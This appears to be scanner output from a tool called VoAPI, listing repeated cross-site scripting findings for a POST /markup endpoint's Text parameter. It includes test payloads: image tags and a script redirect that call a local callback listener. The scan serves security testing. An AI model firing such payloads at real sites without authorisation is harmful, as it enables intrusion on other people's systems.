-------- VoAPI Vul API --------
API Vul Type: xss
Vul API Url: /markup
Vul API Method: Post
API Vul Param: Text
API Test Payload: <img src='http://127.0.0.1:4444/xss/markupVoAPIText'>

API Vul Type: xss
Vul API Url: /markup
Vul API Method: Post
API Vul Param: Text
API Test Payload: <img src='http://127.0.0.1:4444/xss/markupVoAPIText'>

-------- VoAPI Vul API --------
API Vul Type: xss
Vul API Url: /markup
Vul API Method: Post
API Vul Param: Text
API Test Payload: <img src='https://127.0.0.1:4445/xss/markupVoAPIText'>

API Vul Type: xss
Vul API Url: /markup
Vul API Method: Post
API Vul Param: Text
API Test Payload: <img src='https://127.0.0.1:4445/xss/markupVoAPIText'>

-------- VoAPI Vul API --------
API Vul Type: xss
Vul API Url: /markup
Vul API Method: Post
API Vul Param: Text
API Test Payload: <script>window.location='http://127.0.0.1:4444/xss/markupVoAPIText'</script>

API Vul Type: xss
Vul API Url: /markup
Vul API Method: Post
API Vul Param: Text
API Test Payload: <script>window.location='http://127.0.0.1:4444/xss/markupVoAPIText'</script>

